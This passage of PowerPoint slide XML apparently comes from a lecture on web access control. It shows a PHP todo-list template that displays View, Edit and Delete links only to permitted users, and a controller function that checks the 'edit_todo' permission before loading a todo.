              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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foreach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> as $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) : ]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>        [[ if (Authenticator::instance() -&gt; can('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>view_todo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"@@todo/view/{{$todo-&gt;getId()}}@@"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[View]</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 if (Authenticator::instance() -&gt; can('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>edit_todo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"@@todo/edit/{{$todo-&gt;getId()}}@@"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[Edit]</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 if (Authenticator::instance() -&gt; can('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>delete_todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>')) : ]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"@@todo/delete/{{$todo-&gt;getId()}}@@"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[Del]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR"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endif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>; ]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>        {{$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>getDescription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>()}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>endforeach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>; ]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3733800"/>
            <a:ext cx="4648200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14120"/>
              <a:gd name="adj2" fmla="val -84274"/>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In the view, we prevent the link to edit something from being shown unless they can edit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="7162800" cy="35052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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>get_edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    Authenticator::instance() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ensure(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>edit_todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>safeParam($params, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800040"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$id) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>die</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> specified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>findById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>($id)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>die</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> found.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3599702" y="2514600"/>
            <a:ext cx="4648200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
